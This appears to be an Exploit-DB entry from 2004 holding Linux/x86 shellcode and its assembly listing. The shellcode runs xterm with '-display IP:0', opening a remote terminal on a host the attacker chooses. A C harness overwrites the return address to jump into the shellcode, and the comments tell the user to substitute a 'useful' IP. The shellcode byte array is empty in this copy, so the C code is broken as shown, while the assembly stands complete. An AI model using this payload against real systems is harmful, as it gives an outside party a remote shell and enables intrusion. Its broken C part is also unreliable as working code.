linux/x86 - xterm -ut -display IP:0 132 bytes

ID EDB-ID:13440
Type exploitdb
Reporter RaiSe
Modified 2004-09-26T00:00:00


linux/x86 xterm -ut -display [IP]:0 132 bytes. Shellcode exploit for lin_x86 platform

 *  Linux/x86
 *  execve() of /usr/X11R6/bin/xterm -ut -display ip:0, exit()
 * is an example, you must change it to a useful ip 
 *  (making a subrutine into the exploit?)
 *  - you must not delete 'K' after ip:0 -
#include <stdio.h>

char shellcode[] =

main() {
        int *ret;
        ret=(int *)&ret+2;
        printf("Shellcode lenght=%d\n",strlen(shellcode));
        (*ret) = (int)shellcode;

/* Code */
jmp    0x4f
popl   %esi
xorl   %edx,%edx
movb   %dl,0x14(%esi)
movb   %dl,0x18(%esi)
movb   %dl,0x21(%esi)
movb   $0x2b,%dl
xorl   %ecx,%ecx
movb   $0x9,%cl
cmpb   $0x4b,(%edx,%esi)
je     0x5
inc    %edx
loop   -0x9
jmp    0x2b
movb   %dh,(%edx,%esi)
xorl   %edx,%edx
movl   %esi,%ebx
movl   %esi,0x36(%esi)
leal   0x15(%esi),%edi
movl   %edi,0x3a(%esi)
leal   0x19(%esi),%edi
movl   %edi,0x3e(%esi)
leal   0x22(%esi),%edi
movl   %edi,0x42(%esi)
movl   %edx,0x46(%esi)
leal   0x36(%esi),%ecx
leal   0x46(%esi),%edx
xorl   %eax,%eax
movb   $0xb,%eax
int    $0x80
xorl   %ebx,%ebx
movl   %ebx,%eax
inc    %eax
int    $0x80
call   -0x54
.string \"/usr/X11R6/bin/xterm8-ut8-display8127.0.0.1:0K\"

RaiSe <>

// [2004-09-26]